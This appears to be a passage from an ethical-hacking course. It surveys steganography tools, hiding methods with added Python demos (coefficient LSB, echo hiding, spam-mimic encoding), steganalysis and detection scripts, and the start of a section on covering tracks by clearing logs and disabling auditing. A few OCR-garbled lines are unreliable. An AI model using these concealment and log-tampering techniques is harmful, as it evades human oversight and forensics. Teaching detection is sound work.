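    out = [row[:] for row in q]
    for (u, v), bit in zip(slots, bits):
        out[u][v] = (out[u][v] & ~1) | bit
    return out


def extract_bits(q: Block, count: int) -> List[int]:
    return [q[u][v] & 1 for (u, v) in usable_slots(q)[:count]]


def step_block() -> Block:
    """Constructed cover block: four flat quadrants with strong edges."""
    return [[128 + (-55 if x < 4 else 55) + (-70 if y < 4 else 70)
             for y in range(8)] for x in range(8)]


def max_pixel_diff(a: Block, b: Block) -> int:
    return max(abs(a[x][y] - b[x][y]) for x in range(8) for y in range(8))


if __name__ == "__main__":
    q = quantize(step_block())
    bits = [0, 1, 0, 0, 1, 0, 0, 0]          # the letter H
    stego = embed_bits(q, bits)
    print(len(usable_slots(q)), extract_bits(stego, 8))
    print(max_pixel_diff(dequantize(q), dequantize(stego)),
          max_pixel_diff(step_block(), dequantize(quantize(step_block()))))
```

The last line of the demo is the practical lesson: decoding the untouched cover already moves pixels by a few levels, so a message living in spatial LSBs does not survive a JPEG round trip, whereas bits stored in the quantized coefficients are exactly what the decoder reads back.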
Image Steganography Tools

Image steganography tools hide content in images by inserting the hidden data in redundant bits of the data source. You can use image files such as JPEG, GIF, BMP, and PNG to conceal your data.
- OpenStego
  Source: https://www.openstego.com

  OpenStego is a steganography application that provides the following functions:
  - Data Hiding: It can hide any data within a cover file (e.g., images).
  - Watermarking: Watermarking files (e.g., images) with an invisible signature. It can be used to detect unauthorized file copying.
Figure 6.137: Screenshot of OpenStego
Some examples of image steganography tools are as follows:
- QuickStego (http://quickcrypto.com)
- SSuite Picsel (https://www.ssuitesoft.com)
- CryptaPix (https://www.briggsoft.com)
- gifshuffle (http://www.darkside.com.au)
- PHP-Class StreamSteganography (https://www.phpclasses.org)
Document Steganography

Document steganography is the technique of hiding secret messages transferred in the form of documents. It includes the addition of whitespaces and tabs at the ends of lines. A stego document is a cover document comprising the hidden message. Steganography algorithms, referred to as the "stego system," are employed to hide the secret messages in the cover medium at the sender end. The same algorithm is used by the recipient to extract the hidden message from the stego-document. The following diagram illustrates the document steganography process.
Figure 6.138: Document steganography process
Document Steganography Tools

Document steganography tools help in hiding files within documents, such as text or HTML files, using steganography methods.

- StegoStick
  Source: https://sourceforge.net

  StegoStick is a steganographic tool that allows attackers to hide any file in any other file. It is based on image, audio, or video steganography, which hides any file or message in an image (BMP, JPG, GIF, etc.), audio/video (MPG, WAV, etc.), or any other file format (PDF, EXE, CHM, etc.).
Figure: Screenshot of StegoStick
Some examples of document steganography tools are listed as follows:
- StegJ (http://stegj.sourceforge.net)
- Office XML (https://www.irongeek.com)
- SNOW (http://www.darkside.com.au)
- Data Stash (https://www.skyjuicesoftware.com)
- Texto (http://www.eberl.net)
Video Steganography

The image steganography discussed earlier can only hide a small amount of data inside image carrier files. Thus, image steganography can only be used when small amounts of data are to be hidden in the image files. However, one can use video steganography when it is necessary to hide large amounts of data inside carrier files.

Video steganography refers to the hiding of secret information in a carrier video file. The information is hidden in video files of different formats, such as .AVI, .MPG4, .WMV, etc. Discrete cosine transform (DCT) manipulation is used to add secret data at the time of the transformation process of the video.

Video files carry the secret information from one end to another. This ensures greater security of your secret information. Numerous secret messages can be hidden in video files, as every frame consists of both images and sound. As the carrier video file is a moving stream of images and sound, it is difficult for the unintended recipient to notice the distortion in the video file caused by the secret message, and therefore, the message might go unobserved because of the continuous flow of the video. You can apply all the techniques available for image and audio steganography to video steganography.
The following tools facilitate the hiding of secret information in running videos using video steganography:

- OmniHide Pro
  Source: http://omnihide.com

  OmniHide PRO allows you to hide any secret file within an innocuous image, video, music file, etc. The user can use or share the resultant stego file like a normal file without anyone knowing the hidden content; thus, this tool enables you to save your secret file from prying eyes. It also enables you to add a password to hide your file and enhance security.

Figure 6.140: Screenshot of OmniHide PRO
Some examples of video steganography tools are as follows:
- RT Steganography (https://rtstegvideo.sourceforge.net)
- StegoStick (https://sourceforge.net)
- OpenPuff (https://embeddedsw.net)
- MSU StegoVideo (http://www.compression.ru)
Audio Steganography

Audio steganography allows you to conceal a secret message within an audio file such as a WAV, AU, or even MP3 audio file. It embeds secret messages in audio files by slightly changing the binary sequence of the audio file. Changes in the audio file after insertion are not easily detectable, and in this way, the secret messages can be secured from prying ears.

The carrier audio file should not be allowed to be distorted, to avoid detection of hidden messages. Therefore, one should embed the secret data in such a way that a slight change in the audio file can go unnoticed upon listening. One can hide information in an audio file by replacing the LSB or by using frequencies that are not audible to the human ear (>20,000 Hz).

Figure 6.141: Audio steganography process
Audio Steganography Methods

There are certain methods available to conceal your secret messages in audio files. Some methods implement an algorithm that relies on inserting secret information in the form of a noise signal, while other methods rely on exploiting sophisticated signal-processing techniques to hide information.
The following methods can be used to perform audio steganography to hide information:

- Echo Data Hiding

  In the echo data hiding method, you can embed the secret information in the carrier audio signal by introducing an echo into it. Three parameters are used, namely initial amplitude, decay rate, and offset or delay, to hide the secret data. When the offset between the carrier signal and the echo decreases, they combine at a certain point of time at which the human ear cannot distinguish between the two signals. At this point, you can hear an echo as an added resonance to the original signal. However, this point of indistinguishable sounds depends on factors such as the quality of the original audio signal, the type of sound, and listener acuity.

  To encode the resultant signal into binary form, two different delay times are used. These delay times should be below the level of human perception. Parameters such as decay rate and initial amplitude should also be set below threshold audible values so that the echo cannot be heard.
- Spread Spectrum Method

  This method uses two versions of the spread spectrum: direct-sequence spread spectrum (DSSS) and frequency-hopping spread spectrum (FHSS).
  - Direct-Sequence Spread Spectrum (DSSS): DSSS is a frequency modulation technique in which a communication device spreads a signal of low bandwidth over a broad frequency range to enable the sharing of a single channel between multiple users. The DSSS steganography technique transposes the secret messages in radio wave frequencies. DSSS does introduce some random noise to the signal.
  - Frequency-Hopping Spread Spectrum (FHSS): In FHSS, the user alters the audio file's frequency spectrum so that it hops rapidly between frequencies. The spread spectrum method plays a significant role in secure communications, both commercial and military.
- LSB Coding

  LSB coding works similarly to the LSB insertion technique, in which users can insert a secret binary message in the least significant bit of each sampling point of the audio signal. This method allows one to hide enormous amounts of secret data. It is possible to use the two least significant bits to insert secret binary data, but at the risk of creating audible noise in the audio file. Its poor immunity to manipulation makes this method less adaptive: the hidden data are easily destroyed by channel noise and resampling.
- Tone Insertion

  This method involves embedding data in the audio signal by inserting low-power tones. These tones are not audible in the presence of significantly higher-power audio signals, and therefore the presence of the secret message is concealed. It is exceedingly difficult for an eavesdropper to detect the secret message from the audio signal. This method helps to avoid attacks such as low-pass filtering and bit truncation. The audio steganography software implements one of these audio steganography methods to embed the secret data in the audio files.
- Phase Encoding

  Phase coding is described as the method in which an initial audio segment is substituted by a reference phase that represents the data. It encodes the secret message bits as phase shifts in the phase spectrum of a digital signal, achieving a soft encoding in terms of the signal-to-noise ratio.
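Echo data hiding, as described in the list above, is straightforward to implement and decode when the carrier is noise-like. The following Python is an added example for this page (not code from any listed tool): each bit gets its own segment of the carrier, a 0 is hidden by mixing in an echo at one delay and a 1 by an echo at a second delay, and the extractor decides each bit by comparing the segment's autocorrelation at the two candidate delays. The segment length, delays, echo amplitude and the Gaussian-noise carrier are assumptions of the example; on real recordings the same decision is normally taken on the cepstrum rather than the raw autocorrelation, because music is far from white.

```python
"""Echo data hiding with two delays and autocorrelation decoding (added example)."""
import random
from typing import List

SEGMENT = 1024             # samples per hidden bit (assumption of the example)
DELAY0, DELAY1 = 50, 100   # echo offsets, in samples, that encode a 0 and a 1
ALPHA = 0.3                # initial echo amplitude; with a single tap the decay rate folds into it


def add_echo(segment: List[float], delay: int, alpha: float) -> List[float]:
    """Mix a delayed, attenuated copy of the segment back into itself."""
    out = segment[:]
    for n in range(delay, len(segment)):
        out[n] += alpha * segment[n - delay]
    return out


def echo_hide(carrier: List[float], bits: List[int]) -> List[float]:
    if len(bits) * SEGMENT > len(carrier):
        raise ValueError("carrier too short for %d bits" % len(bits))
    stego = carrier[:]
    for i, bit in enumerate(bits):
        lo, hi = i * SEGMENT, (i + 1) * SEGMENT
        stego[lo:hi] = add_echo(carrier[lo:hi], DELAY1 if bit else DELAY0, ALPHA)
    return stego


def _autocorr(segment: List[float], lag: int) -> float:
    return sum(segment[n] * segment[n - lag] for n in range(lag, len(segment)))


def echo_extract(stego: List[float], n_bits: int) -> List[int]:
    """Decide each bit by which candidate delay shows the stronger self-similarity."""
    bits = []
    for i in range(n_bits):
        seg = stego[i * SEGMENT:(i + 1) * SEGMENT]
        bits.append(1 if _autocorr(seg, DELAY1) > _autocorr(seg, DELAY0) else 0)
    return bits


def bytes_to_bits(data: bytes) -> List[int]:
    return [(b >> k) & 1 for b in data for k in range(7, -1, -1)]


def bits_to_bytes(bits: List[int]) -> bytes:
    return bytes(int("".join(str(b) for b in bits[i:i + 8]), 2)
                 for i in range(0, len(bits) - len(bits) % 8, 8))


def noise_carrier(n_samples: int, seed: int = 7) -> List[float]:
    """Constructed noise-like carrier standing in for a real recording."""
    rng = random.Random(seed)
    return [rng.gauss(0.0, 0.1) for _ in range(n_samples)]


if __name__ == "__main__":
    carrier = noise_carrier(16 * SEGMENT)
    stego = echo_hide(carrier, bytes_to_bits(b"Hi"))
    print(bits_to_bytes(echo_extract(stego, 16)))
    print(max(abs(s - c) for s, c in zip(stego, carrier)))
```

The decoder needs nothing but the two delays, so they are effectively the key; a steganalyst who suspects echo hiding sweeps the lag axis of every segment looking for a consistent pair of peaks.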
Audio Steganography Tools

Figure 6.142: Screenshot of DeepSound
Some examples of audio steganography tools are listed as follows:
- BitCrypt (http://bitcrypt.moshe-szweizer.com)
- StegoStick (https://sourceforge.net)
- MP3Stego (https://www.petitcolas.net)
- QuickCrypto (http://www.quickcrypto.com)
- spectrology (https://github.com)
Folder Steganography

Folder steganography refers to hiding secret information in folders. Files are hidden and encrypted within a folder and are not seen by standard Windows applications, including Windows Explorer.

Folder Steganography Tools

Attackers use folder steganography tools to hide and secure folders and hide their confidential data. These tools secure folders using different encryption techniques.
- GiliSoft File Lock Pro
  Source: http://www.gilisoft.com

  GiliSoft File Lock Pro restricts access to files, folders, and drives by locking, hiding, or password-protecting them. Attackers can thus use this tool for these purposes. With this program, nobody can access or destroy the attacker's data without a password.
Figure 6.143: Screenshot of GiliSoft File Lock Pro

Some examples of folder steganography tools are listed as follows:
- Folder Lock (http://www.newsoftwares.net)
- Hide Folders 5 (https://fspro.net)
- Invisible Secrets 4 (http://www.invisiblesecrets.com)
- Max Folder Secure (https://maxpcsecure.com)
- QuickCrypto (http://www.quickcrypto.com)
Spam/Email Steganography

Spam/email steganography refers to the technique of sending secret messages by embedding them and hiding the embedded data in spam emails. Various military agencies supposedly use this technique with the help of steganography algorithms. You can use the Spam Mimic tool to hide a secret message in an email.

Spam/Email Steganography Tool

- Spam Mimic
  Source: http://www.spammimic.com

  Spam Mimic is a spam "grammar" for a mimic engine by Peter Wayner. This encodes secret messages into innocent-looking spam emails. The encoder of this tool encodes the secret message as spam with a password, fake PGP, fake Russian, and space.
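A mimic engine of the kind Spam Mimic is built on can be shown with a tiny grammar. The following Python is an added example for this page, not Spam Mimic's grammar or code: every nonterminal with several productions has a power-of-two number of alternatives, the encoder spends the message bits choosing among them, and the decoder parses the text with the same grammar and recovers the bits from the choices it sees. The grammar (four slots of four alternatives each, so one sentence carries one byte) is constructed for the example; a production grammar is much larger and is what makes the output read like real spam.

```python
"""Grammar-driven mimic encoder in the style of Spam Mimic (added example)."""
from typing import Dict, List

# Constructed grammar. Upper-case tokens are nonterminals; every nonterminal with
# more than one production has a power-of-two number of alternatives, and the
# alternatives start with distinct words so the decoder can parse without backtracking.
GRAMMAR: Dict[str, List[str]] = {
    "MESSAGE": ["SUBJECT VERB OBJECT ENDING"],            # one sentence = 8 bits
    "SUBJECT": ["We", "Our partners", "Leading experts", "Your account manager"],
    "VERB": ["have selected", "are pleased to offer", "cannot wait to send", "urgently need to share"],
    "OBJECT": ["a limited time offer", "an exclusive report", "the free trial", "your special reward"],
    "ENDING": ["today .", "for you only .", "before midnight .", "at no cost ."],
}


def _bits_per_choice(symbol: str) -> int:
    n = len(GRAMMAR[symbol])
    if n & (n - 1):
        raise ValueError("%s needs a power-of-two number of alternatives" % symbol)
    return n.bit_length() - 1


def _expand(symbol: str, bits: List[int], pos: int, out: List[str]) -> int:
    """Spend bits choosing an alternative, then expand it; returns the new bit position."""
    index = 0
    for _ in range(_bits_per_choice(symbol)):
        index = (index << 1) | bits[pos]
        pos += 1
    for token in GRAMMAR[symbol][index].split():
        if token in GRAMMAR:
            pos = _expand(token, bits, pos, out)
        else:
            out.append(token)
    return pos


def _parse(symbol: str, tokens: List[str], pos: int, bits: List[int]) -> int:
    """Inverse of _expand: recognise which alternative was used and emit its bits."""
    choices = GRAMMAR[symbol]
    if len(choices) == 1:
        index = 0
    else:
        index = next(i for i, c in enumerate(choices) if c.split()[0] == tokens[pos])
        for k in range(_bits_per_choice(symbol) - 1, -1, -1):
            bits.append((index >> k) & 1)
    for token in choices[index].split():
        if token in GRAMMAR:
            pos = _parse(token, tokens, pos, bits)
        elif tokens[pos] == token:
            pos += 1
        else:
            raise ValueError("text does not follow the grammar at token %d" % pos)
    return pos


def mimic_encode(secret: bytes) -> str:
    bits = [(b >> k) & 1 for b in secret for k in range(7, -1, -1)]
    out, pos = [], 0
    while pos < len(bits):
        pos = _expand("MESSAGE", bits, pos, out)
    return " ".join(out)


def mimic_decode(text: str) -> bytes:
    tokens, bits, pos = text.split(), [], 0
    while pos < len(tokens):
        pos = _parse("MESSAGE", tokens, pos, bits)
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))


if __name__ == "__main__":
    spam = mimic_encode(b"Hi")
    print(spam)
    print(mimic_decode(spam))
```

Nothing here is encrypted: the grammar is the only secret, and a published grammar (as with Spam Mimic) makes the output decodable by anyone, so a real deployment would encrypt the message before feeding it to the encoder.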
Figure 6.144: Screenshot of Spam Mimic showing the encoding process

Figure 6.145: Screenshot of Spam Mimic showing the encoded output
Steganography Tools for Mobile Phones

- Steganography Master

  Figure 6.146: Screenshot of Steganography Master
- Stegais
  Source: http://stegais.com

  Stegais can hide a message in an image selected from the photo library or in a photo taken by the camera.

  Figure 6.147: Screenshot of Stegais
Some additional steganography tools for mobile phones are as follows:
- SPYPIX (https://www.juicybitssoftware.com)
- Pixelknot: Hidden Messages (https://guardianproject.info)
- PocketStego (https://www.talixa.com)
- Steganography Image (https://play.google.com)
- Steganography (https://github.com)
Steganalysis

Steganalysis is the process of discovering the existence of hidden information in a medium. It is the reverse process of steganography. It is an attack on information security in which the attacker, referred to here as a steganalyst, tries to detect the hidden messages embedded in image, text, audio, and video carrier media using steganography. Steganalysis determines the encoded hidden message and, if possible, recovers the message. It can detect the message by looking at variances between bit patterns and unusually large file sizes.
Steganalysis has two aspects: the detection and the distortion of messages. In the detection phase, the analyst observes the relationships between the steganography tools, stego-media, cover, and message. In the distortion phase, the analyst manipulates the stego-media to extract the embedded message and decides whether it is useless and should be removed altogether.
The first step in steganalysis is to discover a suspicious image that may be harboring a message. This is an attack on the hidden information. There are two other types of attacks against steganography: known-message and chosen-message attacks. In the former, the steganalyst has a known hidden message and the corresponding stego-image. The steganalyst determines patterns that arise from hiding this message, by creating a message with a known stego tool and analyzing the differences in patterns. In a chosen-message attack, the attacker creates steganography media using the known message and a steganography tool (or algorithm).
Cover images disclose more visual clues than stego-images. It is necessary to analyze stego-images to identify the concealed information. The gap between the cover image and stego-image file sizes is the simplest evident signature. Many signatures use some of the color schemes of the cover image.
Once detected, an attacker can destroy a stego-image or modify the hidden messages. It is particularly important to understand the overall structure of the technology and the methods to detect the hidden information in order to uncover such activities.

Some challenges of steganalysis are as follows:
- The suspect information stream may or may not have encoded hidden data
- Efficient and accurate detection of hidden content within digital images is difficult
- The message might have been encrypted before being inserted into a file or signal
- Some of the suspect files or signals may have irrelevant data or noise encoded into them
Steganalysis Methods/Attacks on Steganography

Steganography attacks work according to the type of information available for the steganalyst to perform steganalysis on. This information may include a hidden message, the carrier (cover) medium, the stego-object, steganography tools, or the algorithms used for hiding information. Thus, the classification of steganalysis includes the following types of attacks: stego-only, known-stego, known-message, known-cover, chosen-message, chosen-stego, chi-square, distinguishing statistical, and blind classifier.
- Stego-only attack

  In a stego-only attack, the steganalyst or attacker does not have access to any information except the stego-medium or stego-object. In this attack, the steganalyst must try every possible steganography algorithm and related attack to recover the hidden information.
- Known-stego attack

  In this attack, the attacker knows the steganography algorithm as well as the original and stego-object. The attacker can extract the hidden information with the information at hand.
- Known-message attack

  The known-message attack presumes that the message and the stego-medium are available. Using this attack, one can detect the technique used to hide the message.
- Known-cover attack

  Attackers use the known-cover attack when they know both the stego-object and the original cover medium. This enables a comparison between both media to detect changes in the format of the medium and find the hidden message.
- Chosen-message attack

  The steganalyst uses a known message to generate stego-objects with various steganography tools in order to find the steganography algorithm used to hide the information. The goal in this attack is to determine patterns in the stego-object that may point to the use of specific steganography tools or algorithms.
- Chosen-stego attack

  The chosen-stego attack takes place when the steganalyst knows both the stego-object and the steganography tool or algorithm used to hide the message.
- Chi-square attack

  The chi-square method is based on probability analysis to test whether a given stego-object and the original data are the same or not. If the difference between both is nearly zero, then no data are embedded; otherwise, the stego-object includes embedded data.
Distinguishing
statistical
attack
In the distinguishing
statisticalmethod,the steganalyst or attacker analyzes
the
embeddedalgorithm usedto detect distinguishing
statisticalchanges,
alongwith the
lengthof the embeddeddata
Blindclassifierattack
In the blind classifiermethod,a blind detectoris fed with the original
or unmodified
stego-object andoriginal
of
datato learntheappearancethe original
data.
datafrommultiple Theoutput
perspectives.
of the blind detectoris usedto train the classifierto detectdifferencesbetweenthe
ical andCountermensores
Mackin ©by E-Comel
Copyright
Detecting Steganography (Text, Image, Audio, and Video Files)
Steganography is the art of hiding either confidential or sensitive information within a cover medium. In this method, the unused bits of data in computer files such as graphics, digital images, text, and HTML help in hiding sensitive information from unauthorized users. Detection of the hidden data involves different approaches depending on the file type used. The following file types require specific methods to detect hidden messages.

Text File
For text files, alterations are made to the character positions to hide the data. One can detect these alterations by looking for text patterns or disturbances, the language used, line height, or an unusual number of blank spaces. A simple word processor can sometimes reveal text steganography as it displays the spaces, tabs, and other characters that distort the text's presentation during text steganography. Text steganography can be detected by taking a closer look at the following aspects:
* Unusual patterns in the stego-object
* Appended extra spaces and invisible characters
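The following Python script is an added example, not part of the course text, that checks a text file for the two aspects listed above: appended (trailing) spaces and tabs, and invisible zero-width characters. The list of zero-width code points and the sample texts are constructed for the example; the visible rendering in reveal_whitespace mimics what a word processor's "show formatting marks" view would expose.

```python
# Added example: indicators of text steganography (trailing whitespace, zero-width
# characters, double-space runs). Sample texts below are constructed for the demo.

ZERO_WIDTH = {  # constructed list of common invisible code points
    "\u200b": "ZERO WIDTH SPACE",
    "\u200c": "ZERO WIDTH NON-JOINER",
    "\u200d": "ZERO WIDTH JOINER",
    "\u2060": "WORD JOINER",
    "\ufeff": "ZERO WIDTH NO-BREAK SPACE",
}

def scan_text(text):
    """Return the indicators found in text as a dict."""
    lines = text.split("\n")
    # 1-based numbers of lines that end in spaces/tabs (a classic carrier for bits)
    trailing = [i + 1 for i, ln in enumerate(lines) if ln != ln.rstrip(" \t")]
    invisible = {}
    for ch in text:
        name = ZERO_WIDTH.get(ch)
        if name:
            invisible[name] = invisible.get(name, 0) + 1
    # runs of two spaces inside a line, after trailing whitespace is removed
    double_runs = sum(ln.rstrip(" \t").count("  ") for ln in lines)
    return {
        "trailing_whitespace_lines": trailing,
        "invisible_chars": invisible,
        "double_space_runs": double_runs,
    }

def is_suspicious(text):
    r = scan_text(text)
    return bool(r["trailing_whitespace_lines"]) or bool(r["invisible_chars"]) \
        or r["double_space_runs"] > 0

def reveal_whitespace(text):
    """Make spaces, tabs and zero-width characters visible, like a word processor does."""
    out = text.replace(" ", "\u00b7").replace("\t", "\u2192")
    for ch, name in ZERO_WIDTH.items():
        out = out.replace(ch, "[" + name + "]")
    return out

# Constructed samples: CLEAN is ordinary text; STEGO carries trailing space/tab
# patterns on lines 1-2 and one zero-width space spliced into line 3.
CLEAN = "The quarterly report is attached.\nPlease review it before Friday.\n"
STEGO = ("The quarterly report is attached.  \t \n"
         "Please review it before Friday.\t\t \n"
         "Thanks,\u200b team\n")

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN), ("stego", STEGO)):
        print(label, scan_text(sample))
        print(reveal_whitespace(sample))
```

The check is deliberately conservative: a single trailing space or zero-width character is enough to flag a file for a closer look, because clean documents produced by editors rarely contain either.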
Image File
The information hidden in an image can be detected by determining changes in size, file format, last modified timestamp, and color palette of the file. The following points can help you in detecting image steganography:
* Several display distortions in images
* Sometimes images may become grossly degraded
* Detection of anomalies through evaluating too many original images and stego-images concerning color composition, luminance, pixel relationships, etc.
* Exaggerated "noise"

Statistical analysis methods help to scan an image for steganography. Whenever you insert a secret message into an image, LSBs are no longer random. With encrypted data that has high entropy, the LSB of the cover will not contain information about the original and is more or less random. By using statistical analysis on the LSB, you can identify the difference between random values and real values.
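The chi-square attack described earlier and the LSB statistical analysis described in this paragraph are the same test in practice. The following Python code is an added example, not part of the course text: it implements the pairs-of-values chi-square statistic over 8-bit sample values and converts it to a probability of embedding with the Wilson-Hilferty normal approximation (an assumption of this example; the course gives no formula). The "cover" and "stego" inputs are constructed sample-value streams, not real image files, so the code shows the statistical effect rather than a parser for any image format.

```python
# Added example: pairs-of-values chi-square test for LSB embedding.
# Cover/stego data are constructed with a seeded RNG; no real image is read.
import math
import random

def pov_chi_square(samples):
    """Chi-square statistic over the pairs (2k, 2k+1) of an 8-bit histogram.
    LSB replacement moves mass only inside a pair, so full embedding with a
    high-entropy message makes the two halves of each pair nearly equal."""
    hist = [0] * 256
    for v in samples:
        hist[v] += 1
    stat, categories = 0.0, 0
    for k in range(128):
        even, odd = hist[2 * k], hist[2 * k + 1]
        expected = (even + odd) / 2.0
        if expected == 0:
            continue
        stat += (even - expected) ** 2 / expected
        categories += 1
    return stat, max(categories - 1, 0)   # (statistic, degrees of freedom)

def embedding_probability(stat, df):
    """Upper-tail probability P(X >= stat) for X ~ chi-square(df), via the
    Wilson-Hilferty normal approximation. Close to 1: pair counts are as even as
    embedding makes them. Close to 0: the skew of an untouched cover."""
    if df <= 0:
        return 0.0
    z = ((stat / df) ** (1.0 / 3) - (1 - 2.0 / (9 * df))) / math.sqrt(2.0 / (9 * df))
    return 0.5 * math.erfc(z / math.sqrt(2))

def analyze(samples):
    stat, df = pov_chi_square(samples)
    return {"stat": stat, "df": df, "p": embedding_probability(stat, df)}

def make_cover(n, seed=7):
    """Constructed cover: inside each value pair, ~90% of samples are even,
    the kind of imbalance natural data has and random bits do not."""
    rng = random.Random(seed)
    return [2 * rng.randrange(128) + (1 if rng.random() < 0.1 else 0) for _ in range(n)]

def lsb_embed(samples, seed=11):
    """Simulate full-capacity LSB replacement with an encrypted (random) message."""
    rng = random.Random(seed)
    return [(v & 0xFE) | rng.getrandbits(1) for v in samples]

COVER = make_cover(4096)
STEGO = lsb_embed(COVER)

if __name__ == "__main__":
    for label, data in (("cover", COVER), ("stego", STEGO)):
        r = analyze(data)
        print(f"{label}: chi2={r['stat']:.1f} df={r['df']} p(embedding)={r['p']:.3g}")
```

On the constructed data the cover statistic is roughly ten times its degrees of freedom (probability of embedding essentially zero), while after embedding the statistic falls to about the degrees of freedom, which is exactly what a chi-square variable under the "no difference between pair halves" hypothesis looks like. Real steganalysis tools run the same test over growing prefixes of the image to estimate how much of it was used.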
Audio File
Audio steganography is a process of embedding confidential information such as private documents and files in digital sound. Statistical analysis methods can be used to detect audio steganography as it involves LSB modifications. The inaudible frequencies can be scanned for hidden information. The odd distortions and patterns show the existence of secret data.

Video File
Detection of secret data in video files includes a combination of the methods used in image and audio files. Special code signs and gestures help in detecting secret data.

Both audio and video steganography are quite difficult to detect, compared to other types such as image and document. Moreover, it is extremely hard to detect good steganography of any type. However, careful analysis of audio and video signals for hidden information may increase chances of detecting it correctly.
Steganography Detection Tools
Steganography detection tools allow you to detect and recover hidden information in digital media, such as images, audio, and video.

zsteg
Source: https://github.com
The zsteg tool is used to detect stegano-hidden data in PNG and BMP image files. As shown in the screenshot, you can use the zsteg tool to detect the hidden secret message in the image file.

Figure 6.148: Screenshot of zsteg

Some examples of steganography detection tools are as follows:
* StegoVeritas (https://github.com)
* stegextract (https://github.com)
* StegoHunt™ (https://www.wetstonetech.com)
* Steganography Studio (http://stegstudio.sourceforge.net)
* Virtual Steganographic Laboratory (VSL) (http://vsl.sourceforge.net)
Module Flow
1. System Hacking Concepts
2. Gaining Access
3. Escalating Privileges
4. Maintaining Access
5. Clearing Logs

In the previous section, we saw how an attacker can hide malicious files on a target computer using various steganographic techniques, NTFS streams, and other techniques to maintain future access to the target. Once the attacker has succeeded in performing this malicious operation, the next step involves removing any resultant traces/tracks in the system.
Covering Tracks
Covering tracks is one of the main stages during system hacking. In this stage, the attacker tries to hide and avoid being detected or "traced out" by covering all "tracks," or logs, generated while accessing the target network or computer. We now look at how the attacker removes traces of an attack on a target computer.

Erasing evidence is a must for any attacker who would like to remain obscure. It is a method used to evade a traceback. It starts with erasing the contaminated logs and possible error messages generated in the attack process. The attacker makes changes to the system configuration such that it does not log the future activities. By manipulating and tweaking event logs, the attacker tricks the system administrator into believing that there is no malicious activity in the system and that no intrusion or compromise has taken place.

Because the first thing a system administrator does when monitoring unusual activity is check the system log files, it is common for intruders to use a tool to modify these logs. In some cases, rootkits can disable and discard all existing logs. Attackers remove only those portions of logs that can reveal their presence if they intend to use the system for a long period as a launch base for future exploitations.

Attackers must make the system appear as it did before access was gained and a backdoor was established. This allows them to change any file attributes back to their original state. The information listed, such as file size and date, is just attribute information contained in the file.

Protection against attackers trying to cover their tracks by changing file information can be difficult. However, it is possible to detect whether an attacker has done so by calculating the file's cryptographic hash. This type of hash is a calculation of the entire file before encryption.
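The point made above, that restored attributes do not fool a content hash, can be demonstrated with a small baseline-and-verify script. The following Python code is an added example, not part of the course text: it records a SHA-256 hash plus the size and modification time of every file under a directory, and later reports files whose content changed even though size and mtime were put back to their baseline values. The demo works in a temporary directory with a constructed log file; the file names and contents are assumptions of the example.

```python
# Added example: file integrity baseline that catches content changes hidden
# behind restored attributes. Runs against a temporary directory it creates itself.
import hashlib
import os
import tempfile

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def baseline(root):
    """Record, per file, the content hash and the attributes an attacker restores."""
    base = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            base[os.path.relpath(path, root)] = {
                "sha256": sha256_file(path), "size": st.st_size, "mtime_ns": st.st_mtime_ns}
    return base

def verify(root, base):
    """Compare the tree with the baseline; return sorted (relative path, finding) pairs."""
    findings, seen = [], set()
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            seen.add(rel)
            rec = base.get(rel)
            if rec is None:
                findings.append((rel, "new file"))
                continue
            st = os.stat(path)
            attrs_same = st.st_size == rec["size"] and st.st_mtime_ns == rec["mtime_ns"]
            if sha256_file(path) != rec["sha256"]:
                findings.append((rel, "content-changed"
                                 + (" (size and mtime unchanged)" if attrs_same else "")))
            elif not attrs_same:
                findings.append((rel, "attributes-changed"))
    for rel in base:
        if rel not in seen:
            findings.append((rel, "missing"))
    return sorted(findings)

def demo():
    """Constructed scenario: a log line is altered, keeping the same length,
    and the original mtime is written back with os.utime."""
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "app.log")
        with open(path, "wb") as f:
            f.write(b"2020-11-05 10:02 login alice OK\n")
        base = baseline(root)
        st = os.stat(path)
        with open(path, "wb") as f:
            f.write(b"2020-11-05 10:02 login bob   OK\n")   # same length as the original line
        os.utime(path, ns=(st.st_atime_ns, st.st_mtime_ns))  # put the old timestamp back
        return verify(root, base)

if __name__ == "__main__":
    print(demo())
```

The baseline itself must live where the attacker cannot rewrite it (a separate host or read-only media), otherwise both the file and its recorded hash can be replaced together.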
Attackers may not wish to delete an entire log to cover their tracks, as doing so may require admin privileges. If attackers can delete only attack event logs, they will still be able to escape detection. The attacker can manipulate log files with the help of the following:
* SECEVENT.EVT (security): failed logins, accessing files without privileges
* SYSEVENT.EVT (system): driver failure, things not operating correctly
* APPEVENT.EVT (applications)

Techniques Used for Covering Tracks
The main activities that an attacker performs toward removing his/her traces on a computer are as follows:
* Disabling Auditing: An attacker disables auditing features of the target system.
* Clearing Logs: An attacker clears/deletes the system log entries corresponding to his/her activities.
* Manipulating Logs: An attacker manipulates logs in such a way that he/she will not be caught in legal action.
* Covering Tracks on the Network: An attacker uses techniques such as reverse HTTP shells, reverse ICMP tunnels, DNS tunneling, and TCP parameters to cover tracks on the network.
* Covering Tracks on the OS: An attacker uses NTFS streams to hide and cover malicious files in the target system.
* Deleting Files: An attacker uses a command-line tool such as Cipher.exe to delete the data and prevent recovery of that data in future.
* Disabling Windows Functionality: An attacker disables Windows functionality such as last access timestamp, hibernation, virtual memory, system restore points, etc. to cover tracks.

Thus, the complete job of an attacker involves not only compromising the system successfully, but also disabling logging, clearing log files, eliminating evidence, planting additional tools, and covering his/her tracks.
Disabling Auditing: Auditpol
Source: https://docs.microsoft.com
One of the first steps for an attacker who has command-line capability is to determine the auditing status of the target system, locate sensitive files (such as password files), and implant automatic information-gathering tools (such as a keystroke logger or network sniffer).

Auditpol.exe is the command-line utility tool to change audit security settings at the category and sub-category levels. Attackers can use AuditPol to enable or disable security auditing on local or remote systems, and to adjust the audit criteria for different categories of security events. The moment intruders gain administrative privileges, they disable auditing with the help of auditpol.exe. Once they complete their mission, they again turn on auditing using the same tool.

After gaining access and establishing shell access with the target system, attackers use the following commands to enable/disable system auditing logs:

Enabling system auditing:
